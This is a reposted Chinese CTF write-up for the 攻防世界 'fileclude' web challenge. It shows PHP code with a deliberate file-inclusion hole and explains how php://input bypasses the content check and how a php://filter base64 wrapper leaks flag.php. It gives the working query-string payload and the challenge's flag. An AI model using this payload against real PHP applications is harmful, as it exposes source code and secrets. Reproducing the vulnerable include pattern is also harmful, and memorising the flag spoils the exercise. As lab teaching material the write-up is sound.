目录 题目场景 分析代码 解决思路 编辑 base64解码 找到flag 题目场景 分析代码
目录
PHP
include("flag.php");
highlight_file(__FILE__);
if(isset($_GET["file1"]) && isset($_GET["file2"]))
{
$file1 = $_GET["file1"];
$file2 = $_GET["file2"];
if(!empty($file1) && !empty($file2))
{
if(file_get_contents($file2) === "hello ctf") //要求返回值为hello ctf
{
include($file1);
}
}
else
die("NONONO");
}
文件包含漏洞位于file1与file2两个变量中。其中,file2被放入了file_get_contents函数中,并要求返回值为hello ctf,我们可以用php://input来绕过;而file1被放入include函数中,并且根据题目提示,我们应该获取当前目录下flag.php的文件内容。因此我们可以使用php://filter伪协议来读取源代码。最终可以得到flag.php经过Base64编码后的结果
?file1=php://filter/read=convert.base64-encode/resource=flag.php&file2=php://input
cyberpeace{7eaf71673582b983c07fabf14e1852b0}
来源地址:https://blog.csdn.net/lyshark_lyshark/article/details/126799169
--结束END--
本文标题: 攻防世界WEB练习-fileclude
本文链接: https://www.lsjlt.com/news/398299.html(转载时请注明来源链接)
有问题或投稿请发送至: 邮箱/279061341@qq.com QQ/279061341
2024-02-29
2024-02-29
2024-02-29
2024-02-29
2024-02-29
2024-02-29
2024-02-29
2024-02-29
2024-02-29
2024-02-29
回答
回答
回答
回答
回答
回答
回答
回答
回答
回答
官方手机版
微信公众号
商务合作
0